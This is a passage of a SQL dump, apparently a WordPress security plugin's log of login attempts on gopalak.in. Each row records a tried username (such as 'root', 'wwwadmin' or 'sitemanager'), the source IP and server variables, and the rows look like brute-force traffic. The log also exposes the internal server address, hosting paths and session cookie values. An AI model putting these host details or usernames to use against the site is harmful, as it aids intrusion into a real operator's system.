00:00:00'),(93844,0,'a:2:{s:8:\"username\";s:11:\"yanz@123457\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55092\";s:11:\"REMOTE_ADDR\";s:14:\"103.118.29.120\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745328923.563087;s:12:\"REQUEST_TIME\";i:1745328923;}}','103.118.29.120',0,'2025-04-22 19:05:25','1970-01-01 00:00:00'),(93845,0,'a:2:{s:8:\"username\";s:24:\"loggershell443@gmail.com\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"122\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54730\";s:11:\"REMOTE_ADDR\";s:14:\"185.104.44.163\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"122\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745329346.7147241;s:12:\"REQUEST_TIME\";i:1745329346;}}','185.104.44.163',0,'2025-04-22 19:12:28','1970-01-01 00:00:00'),(93846,0,'a:2:{s:8:\"username\";s:7:\"wadminw\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37474\";s:11:\"REMOTE_ADDR\";s:11:\"89.28.217.3\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745336761.8885469;s:12:\"REQUEST_TIME\";i:1745336761;}}','89.28.217.3',0,'2025-04-22 21:16:03','1970-01-01 00:00:00'),(93847,0,'a:2:{s:8:\"username\";s:8:\"wwwadmin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"32820\";s:11:\"REMOTE_ADDR\";s:14:\"142.44.191.239\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745337201.218123;s:12:\"REQUEST_TIME\";i:1745337201;}}','142.44.191.239',0,'2025-04-22 21:23:23','1970-01-01 00:00:00'),(93848,0,'a:2:{s:8:\"username\";s:4:\"root\";s:6:\"server\";a:41:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:27:\"/wp-login.php?wp_lang=en_US\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:84:\"_jwp=1; swpm_session=2b3f2182d33025f3947194f4609eaed3; _uid=rB8jg2gHvD6X3lRIA3xLAg==\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:19:\"HTTP_SEC_FETCH_DEST\";s:8:\"document\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"57\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57715\";s:11:\"REMOTE_ADDR\";s:13:\"92.255.57.103\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"57\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:13:\"wp_lang=en_US\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745337409.615108;s:12:\"REQUEST_TIME\";i:1745337409;}}','92.255.57.103',0,'2025-04-22 21:26:51','1970-01-01 00:00:00'),(93849,0,'a:2:{s:8:\"username\";s:11:\"yanz@123457\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56652\";s:11:\"REMOTE_ADDR\";s:11:\"45.67.14.64\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745337652.0966439;s:12:\"REQUEST_TIME\";i:1745337652;}}','45.67.14.64',0,'2025-04-22 21:30:53','1970-01-01 00:00:00'),(93850,0,'a:2:{s:8:\"username\";s:24:\"loggershell443@gmail.com\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"122\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37624\";s:11:\"REMOTE_ADDR\";s:12:\"67.205.6.165\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"122\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745338095.650656;s:12:\"REQUEST_TIME\";i:1745338095;}}','67.205.6.165',0,'2025-04-22 21:38:17','1970-01-01 00:00:00'),(93851,0,'a:2:{s:8:\"username\";s:8:\"wwwadmin\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:11:\"HTTP_COOKIE\";s:84:\"_jwp=1; swpm_session=3be516662abc277df5a26ef0d5bed3bd; _uid=rB8jg2gHy+iX3lRIA4FxAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59540\";s:11:\"REMOTE_ADDR\";s:14:\"184.168.126.97\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745341416.7358279;s:12:\"REQUEST_TIME\";i:1745341416;}}','184.168.126.97',0,'2025-04-22 22:33:38','1970-01-01 00:00:00'),(93852,0,'a:2:{s:8:\"username\";s:24:\"loggershell443@gmail.com\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:11:\"HTTP_COOKIE\";s:84:\"_jwp=1; swpm_session=12e61df53ccabf1180ca69b57cec3337; _uid=rB8jg2gH71tdI3lRAwOmAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59632\";s:11:\"REMOTE_ADDR\";s:14:\"103.11.101.122\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745350491.60463;s:12:\"REQUEST_TIME\";i:1745350491;}}','103.11.101.122',0,'2025-04-23 01:04:53','1970-01-01 00:00:00'),(93853,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34374\";s:11:\"REMOTE_ADDR\";s:13:\"66.102.128.27\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745394860.229748;s:12:\"REQUEST_TIME\";i:1745394860;}}','66.102.128.27',0,'2025-04-23 13:24:22','1970-01-01 00:00:00'),(93854,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 